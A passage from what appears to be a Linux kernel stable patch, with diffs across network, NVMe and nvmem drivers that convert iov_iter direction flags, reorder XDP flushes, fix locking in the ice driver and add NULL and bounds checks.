++	iov_iter_kvec(&from, ITER_SOURCE, &v, 1, buf_size);
+ 
+ 	qp_lock(qpair);
+ 
+@@ -3088,7 +3088,7 @@ ssize_t vmci_qpair_dequeue(struct vmci_qp *qpair,
+ 	if (!qpair || !buf)
+ 		return VMCI_ERROR_INVALID_ARGS;
+ 
+-	iov_iter_kvec(&to, READ, &v, 1, buf_size);
++	iov_iter_kvec(&to, ITER_DEST, &v, 1, buf_size);
+ 
+ 	qp_lock(qpair);
+ 
+@@ -3133,7 +3133,7 @@ ssize_t vmci_qpair_peek(struct vmci_qp *qpair,
+ 	if (!qpair || !buf)
+ 		return VMCI_ERROR_INVALID_ARGS;
+ 
+-	iov_iter_kvec(&to, READ, &v, 1, buf_size);
++	iov_iter_kvec(&to, ITER_DEST, &v, 1, buf_size);
+ 
+ 	qp_lock(qpair);
+ 
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ethtool.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ethtool.c
+index 3585f02575dfb..57eeb066a9456 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ethtool.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ethtool.c
+@@ -48,6 +48,7 @@ mcp251xfd_ring_set_ringparam(struct net_device *ndev,
+ 	priv->rx_obj_num = layout.cur_rx;
+ 	priv->rx_obj_num_coalesce_irq = layout.rx_coalesce;
+ 	priv->tx->obj_num = layout.cur_tx;
++	priv->tx_obj_num_coalesce_irq = layout.tx_coalesce;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+index fc68a32ce2f71..d8fb7d4ebd51e 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+@@ -2400,6 +2400,9 @@ static int dpaa_eth_poll(struct napi_struct *napi, int budget)
+ 
+ 	cleaned = qman_p_poll_dqrr(np->p, budget);
+ 
++	if (np->xdp_act & XDP_REDIRECT)
++		xdp_do_flush();
++
+ 	if (cleaned < budget) {
+ 		napi_complete_done(napi, cleaned);
+ 		qman_p_irqsource_add(np->p, QM_PIRQ_DQRI);
+@@ -2407,9 +2410,6 @@ static int dpaa_eth_poll(struct napi_struct *napi, int budget)
+ 		qman_p_irqsource_add(np->p, QM_PIRQ_DQRI);
+ 	}
+ 
+-	if (np->xdp_act & XDP_REDIRECT)
+-		xdp_do_flush();
+-
+ 	return cleaned;
+ }
+ 
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+index 8d029addddad0..6383d9805dac9 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+@@ -1868,10 +1868,15 @@ static int dpaa2_eth_poll(struct napi_struct *napi, int budget)
+ 		if (rx_cleaned >= budget ||
+ 		    txconf_cleaned >= DPAA2_ETH_TXCONF_PER_NAPI) {
+ 			work_done = budget;
++			if (ch->xdp.res & XDP_REDIRECT)
++				xdp_do_flush();
+ 			goto out;
+ 		}
+ 	} while (store_cleaned);
+ 
++	if (ch->xdp.res & XDP_REDIRECT)
++		xdp_do_flush();
++
+ 	/* Update NET DIM with the values for this CDAN */
+ 	dpaa2_io_update_net_dim(ch->dpio, ch->stats.frames_per_cdan,
+ 				ch->stats.bytes_per_cdan);
+@@ -1902,9 +1907,7 @@ out:
+ 		txc_fq->dq_bytes = 0;
+ 	}
+ 
+-	if (ch->xdp.res & XDP_REDIRECT)
+-		xdp_do_flush_map();
+-	else if (rx_cleaned && ch->xdp.res & XDP_TX)
++	if (rx_cleaned && ch->xdp.res & XDP_TX)
+ 		dpaa2_eth_xdp_tx_flush(priv, ch, &priv->fq[flowid]);
+ 
+ 	return work_done;
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index 001500afc4a6e..e04871379baad 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -856,7 +856,7 @@ void ice_set_ethtool_repr_ops(struct net_device *netdev);
+ void ice_set_ethtool_safe_mode_ops(struct net_device *netdev);
+ u16 ice_get_avail_txq_count(struct ice_pf *pf);
+ u16 ice_get_avail_rxq_count(struct ice_pf *pf);
+-int ice_vsi_recfg_qs(struct ice_vsi *vsi, int new_rx, int new_tx);
++int ice_vsi_recfg_qs(struct ice_vsi *vsi, int new_rx, int new_tx, bool locked);
+ void ice_update_vsi_stats(struct ice_vsi *vsi);
+ void ice_update_pf_stats(struct ice_pf *pf);
+ void
+diff --git a/drivers/net/ethernet/intel/ice/ice_dcb_lib.c b/drivers/net/ethernet/intel/ice/ice_dcb_lib.c
+index add90e75f05c5..9aa0437aa598e 100644
+--- a/drivers/net/ethernet/intel/ice/ice_dcb_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_dcb_lib.c
+@@ -434,7 +434,7 @@ int ice_pf_dcb_cfg(struct ice_pf *pf, struct ice_dcbx_cfg *new_cfg, bool locked)
+ 		goto out;
+ 	}
+ 
+-	ice_pf_dcb_recfg(pf);
++	ice_pf_dcb_recfg(pf, false);
+ 
+ out:
+ 	/* enable previously downed VSIs */
+@@ -724,12 +724,13 @@ static int ice_dcb_noncontig_cfg(struct ice_pf *pf)
+ /**
+  * ice_pf_dcb_recfg - Reconfigure all VEBs and VSIs
+  * @pf: pointer to the PF struct
++ * @locked: is adev device lock held
+  *
+  * Assumed caller has already disabled all VSIs before
+  * calling this function. Reconfiguring DCB based on
+  * local_dcbx_cfg.
+  */
+-void ice_pf_dcb_recfg(struct ice_pf *pf)
++void ice_pf_dcb_recfg(struct ice_pf *pf, bool locked)
+ {
+ 	struct ice_dcbx_cfg *dcbcfg = &pf->hw.port_info->qos_cfg.local_dcbx_cfg;
+ 	struct iidc_event *event;
+@@ -776,14 +777,16 @@ void ice_pf_dcb_recfg(struct ice_pf *pf)
+ 		if (vsi->type == ICE_VSI_PF)
+ 			ice_dcbnl_set_all(vsi);
+ 	}
+-	/* Notify the AUX drivers that TC change is finished */
+-	event = kzalloc(sizeof(*event), GFP_KERNEL);
+-	if (!event)
+-		return;
++	if (!locked) {
++		/* Notify the AUX drivers that TC change is finished */
++		event = kzalloc(sizeof(*event), GFP_KERNEL);
++		if (!event)
++			return;
+ 
+-	set_bit(IIDC_EVENT_AFTER_TC_CHANGE, event->type);
+-	ice_send_event_to_aux(pf, event);
+-	kfree(event);
++		set_bit(IIDC_EVENT_AFTER_TC_CHANGE, event->type);
++		ice_send_event_to_aux(pf, event);
++		kfree(event);
++	}
+ }
+ 
+ /**
+@@ -1034,7 +1037,7 @@ ice_dcb_process_lldp_set_mib_change(struct ice_pf *pf,
+ 	}
+ 
+ 	/* changes in configuration update VSI */
+-	ice_pf_dcb_recfg(pf);
++	ice_pf_dcb_recfg(pf, false);
+ 
+ 	/* enable previously downed VSIs */
+ 	ice_dcb_ena_dis_vsi(pf, true, true);
+diff --git a/drivers/net/ethernet/intel/ice/ice_dcb_lib.h b/drivers/net/ethernet/intel/ice/ice_dcb_lib.h
+index 4c421c842a13f..800879a88c5e7 100644
+--- a/drivers/net/ethernet/intel/ice/ice_dcb_lib.h
++++ b/drivers/net/ethernet/intel/ice/ice_dcb_lib.h
+@@ -23,7 +23,7 @@ u8 ice_dcb_get_tc(struct ice_vsi *vsi, int queue_index);
+ int
+ ice_pf_dcb_cfg(struct ice_pf *pf, struct ice_dcbx_cfg *new_cfg, bool locked);
+ int ice_dcb_bwchk(struct ice_pf *pf, struct ice_dcbx_cfg *dcbcfg);
+-void ice_pf_dcb_recfg(struct ice_pf *pf);
++void ice_pf_dcb_recfg(struct ice_pf *pf, bool locked);
+ void ice_vsi_cfg_dcb_rings(struct ice_vsi *vsi);
+ int ice_init_pf_dcb(struct ice_pf *pf, bool locked);
+ void ice_update_dcb_stats(struct ice_pf *pf);
+@@ -128,7 +128,7 @@ static inline u8 ice_get_pfc_mode(struct ice_pf *pf)
+ 	return 0;
+ }
+ 
+-static inline void ice_pf_dcb_recfg(struct ice_pf *pf) { }
++static inline void ice_pf_dcb_recfg(struct ice_pf *pf, bool locked) { }
+ static inline void ice_vsi_cfg_dcb_rings(struct ice_vsi *vsi) { }
+ static inline void ice_update_dcb_stats(struct ice_pf *pf) { }
+ static inline void
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool.c b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+index b7be84bbe72d6..e1f6373a3a2c0 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+@@ -3472,7 +3472,9 @@ static int ice_set_channels(struct net_device *dev, struct ethtool_channels *ch)
+ 	struct ice_vsi *vsi = np->vsi;
+ 	struct ice_pf *pf = vsi->back;
+ 	int new_rx = 0, new_tx = 0;
++	bool locked = false;
+ 	u32 curr_combined;
++	int ret = 0;
+ 
+ 	/* do not support changing channels in Safe Mode */
+ 	if (ice_is_safe_mode(pf)) {
+@@ -3536,15 +3538,33 @@ static int ice_set_channels(struct net_device *dev, struct ethtool_channels *ch)
+ 		return -EINVAL;
+ 	}
+ 
+-	ice_vsi_recfg_qs(vsi, new_rx, new_tx);
++	if (pf->adev) {
++		mutex_lock(&pf->adev_mutex);
++		device_lock(&pf->adev->dev);
++		locked = true;
++		if (pf->adev->dev.driver) {
++			netdev_err(dev, "Cannot change channels when RDMA is active\n");
++			ret = -EBUSY;
++			goto adev_unlock;
++		}
++	}
++
++	ice_vsi_recfg_qs(vsi, new_rx, new_tx, locked);
+ 
+-	if (!netif_is_rxfh_configured(dev))
+-		return ice_vsi_set_dflt_rss_lut(vsi, new_rx);
++	if (!netif_is_rxfh_configured(dev)) {
++		ret = ice_vsi_set_dflt_rss_lut(vsi, new_rx);
++		goto adev_unlock;
++	}
+ 
+ 	/* Update rss_size due to change in Rx queues */
+ 	vsi->rss_size = ice_get_valid_rss_size(&pf->hw, new_rx);
+ 
+-	return 0;
++adev_unlock:
++	if (locked) {
++		device_unlock(&pf->adev->dev);
++		mutex_unlock(&pf->adev_mutex);
++	}
++	return ret;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index ca2898467dcb5..1ac5f0018c7eb 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -4192,12 +4192,13 @@ bool ice_is_wol_supported(struct ice_hw *hw)
+  * @vsi: VSI being changed
+  * @new_rx: new number of Rx queues
+  * @new_tx: new number of Tx queues
++ * @locked: is adev device_lock held
+  *
+  * Only change the number of queues if new_tx, or new_rx is non-0.
+  *
+  * Returns 0 on success.
+  */
+-int ice_vsi_recfg_qs(struct ice_vsi *vsi, int new_rx, int new_tx)
++int ice_vsi_recfg_qs(struct ice_vsi *vsi, int new_rx, int new_tx, bool locked)
+ {
+ 	struct ice_pf *pf = vsi->back;
+ 	int err = 0, timeout = 50;
+@@ -4226,7 +4227,7 @@ int ice_vsi_recfg_qs(struct ice_vsi *vsi, int new_rx, int new_tx)
+ 
+ 	ice_vsi_close(vsi);
+ 	ice_vsi_rebuild(vsi, false);
+-	ice_pf_dcb_recfg(pf);
++	ice_pf_dcb_recfg(pf, locked);
+ 	ice_vsi_open(vsi);
+ done:
+ 	clear_bit(ICE_CFG_BUSY, pf->state);
+diff --git a/drivers/net/ethernet/intel/igc/igc_ptp.c b/drivers/net/ethernet/intel/igc/igc_ptp.c
+index c34734d432e0d..4e10ced736dbb 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ptp.c
++++ b/drivers/net/ethernet/intel/igc/igc_ptp.c
+@@ -417,10 +417,12 @@ static int igc_ptp_verify_pin(struct ptp_clock_info *ptp, unsigned int pin,
+  *
+  * We need to convert the system time value stored in the RX/TXSTMP registers
+  * into a hwtstamp which can be used by the upper level timestamping functions.
++ *
++ * Returns 0 on success.
+  **/
+-static void igc_ptp_systim_to_hwtstamp(struct igc_adapter *adapter,
+-				       struct skb_shared_hwtstamps *hwtstamps,
+-				       u64 systim)
++static int igc_ptp_systim_to_hwtstamp(struct igc_adapter *adapter,
++				      struct skb_shared_hwtstamps *hwtstamps,
++				      u64 systim)
+ {
+ 	switch (adapter->hw.mac.type) {
+ 	case igc_i225:
+@@ -430,8 +432,9 @@ static void igc_ptp_systim_to_hwtstamp(struct igc_adapter *adapter,
+ 						systim & 0xFFFFFFFF);
+ 		break;
+ 	default:
+-		break;
++		return -EINVAL;
+ 	}
++	return 0;
+ }
+ 
+ /**
+@@ -652,7 +655,8 @@ static void igc_ptp_tx_hwtstamp(struct igc_adapter *adapter)
+ 
+ 	regval = rd32(IGC_TXSTMPL);
+ 	regval |= (u64)rd32(IGC_TXSTMPH) << 32;
+-	igc_ptp_systim_to_hwtstamp(adapter, &shhwtstamps, regval);
++	if (igc_ptp_systim_to_hwtstamp(adapter, &shhwtstamps, regval))
++		return;
+ 
+ 	switch (adapter->link_speed) {
+ 	case SPEED_10:
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+index 88dee589cb217..dc7bd2ce78f7d 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+@@ -1500,6 +1500,9 @@ static const struct devlink_param rvu_af_dl_params[] = {
+ 			     BIT(DEVLINK_PARAM_CMODE_RUNTIME),
+ 			     rvu_af_dl_dwrr_mtu_get, rvu_af_dl_dwrr_mtu_set,
+ 			     rvu_af_dl_dwrr_mtu_validate),
++};
++
++static const struct devlink_param rvu_af_dl_param_exact_match[] = {
+ 	DEVLINK_PARAM_DRIVER(RVU_AF_DEVLINK_PARAM_ID_NPC_EXACT_FEATURE_DISABLE,
+ 			     "npc_exact_feature_disable", DEVLINK_PARAM_TYPE_STRING,
+ 			     BIT(DEVLINK_PARAM_CMODE_RUNTIME),
+@@ -1563,7 +1566,6 @@ int rvu_register_dl(struct rvu *rvu)
+ {
+ 	struct rvu_devlink *rvu_dl;
+ 	struct devlink *dl;
+-	size_t size;
+ 	int err;
+ 
+ 	dl = devlink_alloc(&rvu_devlink_ops, sizeof(struct rvu_devlink),
+@@ -1585,21 +1587,32 @@ int rvu_register_dl(struct rvu *rvu)
+ 		goto err_dl_health;
+ 	}
+ 
++	err = devlink_params_register(dl, rvu_af_dl_params, ARRAY_SIZE(rvu_af_dl_params));
++	if (err) {
++		dev_err(rvu->dev,
++			"devlink params register failed with error %d", err);
++		goto err_dl_health;
++	}
++
+ 	/* Register exact match devlink only for CN10K-B */
+-	size = ARRAY_SIZE(rvu_af_dl_params);
+ 	if (!rvu_npc_exact_has_match_table(rvu))
+-		size -= 1;
++		goto done;
+ 
+-	err = devlink_params_register(dl, rvu_af_dl_params, size);
++	err = devlink_params_register(dl, rvu_af_dl_param_exact_match,
++				      ARRAY_SIZE(rvu_af_dl_param_exact_match));
+ 	if (err) {
+ 		dev_err(rvu->dev,
+-			"devlink params register failed with error %d", err);
+-		goto err_dl_health;
++			"devlink exact match params register failed with error %d", err);
++		goto err_dl_exact_match;
+ 	}
+ 
++done:
+ 	devlink_register(dl);
+ 	return 0;
+ 
++err_dl_exact_match:
++	devlink_params_unregister(dl, rvu_af_dl_params, ARRAY_SIZE(rvu_af_dl_params));
++
+ err_dl_health:
+ 	rvu_health_reporters_destroy(rvu);
+ 	devlink_free(dl);
+@@ -1612,8 +1625,14 @@ void rvu_unregister_dl(struct rvu *rvu)
+ 	struct devlink *dl = rvu_dl->dl;
+ 
+ 	devlink_unregister(dl);
+-	devlink_params_unregister(dl, rvu_af_dl_params,
+-				  ARRAY_SIZE(rvu_af_dl_params));
++
++	devlink_params_unregister(dl, rvu_af_dl_params, ARRAY_SIZE(rvu_af_dl_params));
++
++	/* Unregister exact match devlink only for CN10K-B */
++	if (rvu_npc_exact_has_match_table(rvu))
++		devlink_params_unregister(dl, rvu_af_dl_param_exact_match,
++					  ARRAY_SIZE(rvu_af_dl_param_exact_match));
++
+ 	rvu_health_reporters_destroy(rvu);
+ 	devlink_free(dl);
+ }
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_fp.c b/drivers/net/ethernet/qlogic/qede/qede_fp.c
+index 7c2af482192d7..cb1746bc0e0c5 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_fp.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_fp.c
+@@ -1438,6 +1438,10 @@ int qede_poll(struct napi_struct *napi, int budget)
+ 	rx_work_done = (likely(fp->type & QEDE_FASTPATH_RX) &&
+ 			qede_has_rx_work(fp->rxq)) ?
+ 			qede_rx_int(fp, budget) : 0;
++
++	if (fp->xdp_xmit & QEDE_XDP_REDIRECT)
++		xdp_do_flush();
++
+ 	/* Handle case where we are called by netpoll with a budget of 0 */
+ 	if (rx_work_done < budget || !budget) {
+ 		if (!qede_poll_is_more_work(fp)) {
+@@ -1457,9 +1461,6 @@ int qede_poll(struct napi_struct *napi, int budget)
+ 		qede_update_tx_producer(fp->xdp_tx);
+ 	}
+ 
+-	if (fp->xdp_xmit & QEDE_XDP_REDIRECT)
+-		xdp_do_flush_map();
+-
+ 	return rx_work_done;
+ }
+ 
+diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c
+index 0556542d7a6b6..3a86f1213a051 100644
+--- a/drivers/net/ethernet/sfc/efx.c
++++ b/drivers/net/ethernet/sfc/efx.c
+@@ -1003,8 +1003,11 @@ static int efx_pci_probe_post_io(struct efx_nic *efx)
+ 	/* Determine netdevice features */
+ 	net_dev->features |= (efx->type->offload_features | NETIF_F_SG |
+ 			      NETIF_F_TSO | NETIF_F_RXCSUM | NETIF_F_RXALL);
+-	if (efx->type->offload_features & (NETIF_F_IPV6_CSUM | NETIF_F_HW_CSUM))
++	if (efx->type->offload_features & (NETIF_F_IPV6_CSUM | NETIF_F_HW_CSUM)) {
+ 		net_dev->features |= NETIF_F_TSO6;
++		if (efx_has_cap(efx, TX_TSO_V2_ENCAP))
++			net_dev->hw_enc_features |= NETIF_F_TSO6;
++	}
+ 	/* Check whether device supports TSO */
+ 	if (!efx->type->tso_versions || !efx->type->tso_versions(efx))
+ 		net_dev->features &= ~NETIF_F_ALL_TSO;
+diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c
+index 9352dad58996d..e02d1e3ef672a 100644
+--- a/drivers/net/hyperv/netvsc.c
++++ b/drivers/net/hyperv/netvsc.c
+@@ -987,9 +987,6 @@ static void netvsc_copy_to_send_buf(struct netvsc_device *net_device,
+ void netvsc_dma_unmap(struct hv_device *hv_dev,
+ 		      struct hv_netvsc_packet *packet)
+ {
+-	u32 page_count = packet->cp_partial ?
+-		packet->page_buf_cnt - packet->rmsg_pgcnt :
+-		packet->page_buf_cnt;
+ 	int i;
+ 
+ 	if (!hv_is_isolation_supported())
+@@ -998,7 +995,7 @@ void netvsc_dma_unmap(struct hv_device *hv_dev,
+ 	if (!packet->dma_range)
+ 		return;
+ 
+-	for (i = 0; i < page_count; i++)
++	for (i = 0; i < packet->page_buf_cnt; i++)
+ 		dma_unmap_single(&hv_dev->device, packet->dma_range[i].dma,
+ 				 packet->dma_range[i].mapping_size,
+ 				 DMA_TO_DEVICE);
+@@ -1028,9 +1025,7 @@ static int netvsc_dma_map(struct hv_device *hv_dev,
+ 			  struct hv_netvsc_packet *packet,
+ 			  struct hv_page_buffer *pb)
+ {
+-	u32 page_count =  packet->cp_partial ?
+-		packet->page_buf_cnt - packet->rmsg_pgcnt :
+-		packet->page_buf_cnt;
++	u32 page_count = packet->page_buf_cnt;
+ 	dma_addr_t dma;
+ 	int i;
+ 
+diff --git a/drivers/net/phy/dp83822.c b/drivers/net/phy/dp83822.c
+index b60db8b6f4774..267e6fd3d4448 100644
+--- a/drivers/net/phy/dp83822.c
++++ b/drivers/net/phy/dp83822.c
+@@ -233,7 +233,8 @@ static int dp83822_config_intr(struct phy_device *phydev)
+ 				DP83822_ENERGY_DET_INT_EN |
+ 				DP83822_LINK_QUAL_INT_EN);
+ 
+-		if (!dp83822->fx_enabled)
++		/* Private data pointer is NULL on DP83825/26 */
++		if (!dp83822 || !dp83822->fx_enabled)
+ 			misr_status |= DP83822_ANEG_COMPLETE_INT_EN |
+ 				       DP83822_DUP_MODE_CHANGE_INT_EN |
+ 				       DP83822_SPEED_CHANGED_INT_EN;
+@@ -253,7 +254,8 @@ static int dp83822_config_intr(struct phy_device *phydev)
+ 				DP83822_PAGE_RX_INT_EN |
+ 				DP83822_EEE_ERROR_CHANGE_INT_EN);
+ 
+-		if (!dp83822->fx_enabled)
++		/* Private data pointer is NULL on DP83825/26 */
++		if (!dp83822 || !dp83822->fx_enabled)
+ 			misr_status |= DP83822_ANEG_ERR_INT_EN |
+ 				       DP83822_WOL_PKT_INT_EN;
+ 
+diff --git a/drivers/net/phy/meson-gxl.c b/drivers/net/phy/meson-gxl.c
+index c49062ad72c6c..5e41658b1e2fa 100644
+--- a/drivers/net/phy/meson-gxl.c
++++ b/drivers/net/phy/meson-gxl.c
+@@ -271,6 +271,8 @@ static struct phy_driver meson_gxl_phy[] = {
+ 		.handle_interrupt = meson_gxl_handle_interrupt,
+ 		.suspend        = genphy_suspend,
+ 		.resume         = genphy_resume,
++		.read_mmd	= genphy_read_mmd_unsupported,
++		.write_mmd	= genphy_write_mmd_unsupported,
+ 	},
+ };
+ 
+diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
+index d4c821c8cf57c..1d71f5276241c 100644
+--- a/drivers/net/ppp/ppp_generic.c
++++ b/drivers/net/ppp/ppp_generic.c
+@@ -480,7 +480,7 @@ static ssize_t ppp_read(struct file *file, char __user *buf,
+ 	ret = -EFAULT;
+ 	iov.iov_base = buf;
+ 	iov.iov_len = count;
+-	iov_iter_init(&to, READ, &iov, 1, count);
++	iov_iter_init(&to, ITER_DEST, &iov, 1, count);
+ 	if (skb_copy_datagram_iter(skb, 0, &to, skb->len))
+ 		goto outf;
+ 	ret = skb->len;
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 3cd15f16090f1..20b1b34a092ad 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -1673,13 +1673,13 @@ static int virtnet_poll(struct napi_struct *napi, int budget)
+ 
+ 	received = virtnet_receive(rq, budget, &xdp_xmit);
+ 
++	if (xdp_xmit & VIRTIO_XDP_REDIR)
++		xdp_do_flush();
++
+ 	/* Out of packets? */
+ 	if (received < budget)
+ 		virtqueue_napi_complete(napi, rq->vq, received);
+ 
+-	if (xdp_xmit & VIRTIO_XDP_REDIR)
+-		xdp_do_flush();
+-
+ 	if (xdp_xmit & VIRTIO_XDP_TX) {
+ 		sq = virtnet_xdp_get_sq(vi);
+ 		if (virtqueue_kick_prepare(sq->vq) && virtqueue_notify(sq->vq)) {
+@@ -2154,8 +2154,8 @@ static int virtnet_close(struct net_device *dev)
+ 	cancel_delayed_work_sync(&vi->refill);
+ 
+ 	for (i = 0; i < vi->max_queue_pairs; i++) {
+-		xdp_rxq_info_unreg(&vi->rq[i].xdp_rxq);
+ 		napi_disable(&vi->rq[i].napi);
++		xdp_rxq_info_unreg(&vi->rq[i].xdp_rxq);
+ 		virtnet_napi_tx_disable(&vi->sq[i].napi);
+ 	}
+ 
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index dfcfb33333690..ea8409e0e70e7 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -91,6 +91,9 @@
+ #define BRCMF_ASSOC_PARAMS_FIXED_SIZE \
+ 	(sizeof(struct brcmf_assoc_params_le) - sizeof(u16))
+ 
++#define BRCMF_MAX_CHANSPEC_LIST \
++	(BRCMF_DCMD_MEDLEN / sizeof(__le32) - 1)
++
+ static bool check_vif_up(struct brcmf_cfg80211_vif *vif)
+ {
+ 	if (!test_bit(BRCMF_VIF_STATUS_READY, &vif->sme_state)) {
+@@ -6556,6 +6559,13 @@ static int brcmf_construct_chaninfo(struct brcmf_cfg80211_info *cfg,
+ 			band->channels[i].flags = IEEE80211_CHAN_DISABLED;
+ 
+ 	total = le32_to_cpu(list->count);
++	if (total > BRCMF_MAX_CHANSPEC_LIST) {
++		bphy_err(drvr, "Invalid count of channel Spec. (%u)\n",
++			 total);
++		err = -EINVAL;
++		goto fail_pbuf;
++	}
++
+ 	for (i = 0; i < total; i++) {
+ 		ch.chspec = (u16)le32_to_cpu(list->element[i]);
+ 		cfg->d11inf.decchspec(&ch);
+@@ -6701,6 +6711,13 @@ static int brcmf_enable_bw40_2g(struct brcmf_cfg80211_info *cfg)
+ 		band = cfg_to_wiphy(cfg)->bands[NL80211_BAND_2GHZ];
+ 		list = (struct brcmf_chanspec_list *)pbuf;
+ 		num_chan = le32_to_cpu(list->count);
++		if (num_chan > BRCMF_MAX_CHANSPEC_LIST) {
++			bphy_err(drvr, "Invalid count of channel Spec. (%u)\n",
++				 num_chan);
++			kfree(pbuf);
++			return -EINVAL;
++		}
++
+ 		for (i = 0; i < num_chan; i++) {
+ 			ch.chspec = (u16)le32_to_cpu(list->element[i]);
+ 			cfg->d11inf.decchspec(&ch);
+diff --git a/drivers/net/wwan/t7xx/t7xx_pci.c b/drivers/net/wwan/t7xx/t7xx_pci.c
+index 871f2a27a398a..226fc1703e90f 100644
+--- a/drivers/net/wwan/t7xx/t7xx_pci.c
++++ b/drivers/net/wwan/t7xx/t7xx_pci.c
+@@ -121,6 +121,8 @@ void t7xx_pci_pm_init_late(struct t7xx_pci_dev *t7xx_dev)
+ 	iowrite32(T7XX_L1_BIT(0), IREG_BASE(t7xx_dev) + ENABLE_ASPM_LOWPWR);
+ 	atomic_set(&t7xx_dev->md_pm_state, MTK_PM_RESUMED);
+ 
++	pm_runtime_mark_last_busy(&t7xx_dev->pdev->dev);
++	pm_runtime_allow(&t7xx_dev->pdev->dev);
+ 	pm_runtime_put_noidle(&t7xx_dev->pdev->dev);
+ }
+ 
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index eacd445b5333f..4c052c261517e 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -301,7 +301,7 @@ static inline void nvme_tcp_advance_req(struct nvme_tcp_request *req,
+ 	if (!iov_iter_count(&req->iter) &&
+ 	    req->data_sent < req->data_len) {
+ 		req->curr_bio = req->curr_bio->bi_next;
+-		nvme_tcp_init_iter(req, WRITE);
++		nvme_tcp_init_iter(req, ITER_SOURCE);
+ 	}
+ }
+ 
+@@ -781,7 +781,7 @@ static int nvme_tcp_recv_data(struct nvme_tcp_queue *queue, struct sk_buff *skb,
+ 				nvme_tcp_init_recv_ctx(queue);
+ 				return -EIO;
+ 			}
+-			nvme_tcp_init_iter(req, READ);
++			nvme_tcp_init_iter(req, ITER_DEST);
+ 		}
+ 
+ 		/* we can read only from what is left in this bio */
+diff --git a/drivers/nvme/target/io-cmd-file.c b/drivers/nvme/target/io-cmd-file.c
+index e55ec6fefd7f4..871c4f32f443f 100644
+--- a/drivers/nvme/target/io-cmd-file.c
++++ b/drivers/nvme/target/io-cmd-file.c
+@@ -92,10 +92,10 @@ static ssize_t nvmet_file_submit_bvec(struct nvmet_req *req, loff_t pos,
+ 		if (req->cmd->rw.control & cpu_to_le16(NVME_RW_FUA))
+ 			ki_flags |= IOCB_DSYNC;
+ 		call_iter = req->ns->file->f_op->write_iter;
+-		rw = WRITE;
++		rw = ITER_SOURCE;
+ 	} else {
+ 		call_iter = req->ns->file->f_op->read_iter;
+-		rw = READ;
++		rw = ITER_DEST;
+ 	}
+ 
+ 	iov_iter_bvec(&iter, rw, req->f.bvec, nr_segs, count);
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 6c1476e086ef4..cc05c094de221 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -331,7 +331,7 @@ static void nvmet_tcp_build_pdu_iovec(struct nvmet_tcp_cmd *cmd)
+ 		sg_offset = 0;
+ 	}
+ 
+-	iov_iter_bvec(&cmd->recv_msg.msg_iter, READ, cmd->iov,
++	iov_iter_bvec(&cmd->recv_msg.msg_iter, ITER_DEST, cmd->iov,
+ 		      nr_pages, cmd->pdu_len);
+ }
+ 
+diff --git a/drivers/nvmem/brcm_nvram.c b/drivers/nvmem/brcm_nvram.c
+index 4441daa209651..7bd65fc2942e2 100644
+--- a/drivers/nvmem/brcm_nvram.c
++++ b/drivers/nvmem/brcm_nvram.c
+@@ -97,6 +97,9 @@ static int brcm_nvram_parse(struct brcm_nvram *priv)
+ 	len = le32_to_cpu(header.len);
+ 
+ 	data = kzalloc(len, GFP_KERNEL);
++	if (!data)
++		return -ENOMEM;
++
+ 	memcpy_fromio(data, priv->base, len);
+ 	data[len - 1] = '\0';
+ 
+diff --git a/drivers/nvmem/core.c b/drivers/nvmem/core.c
+index 321d7d63e0683..34ee9d36ee7ba 100644
+--- a/drivers/nvmem/core.c
++++ b/drivers/nvmem/core.c
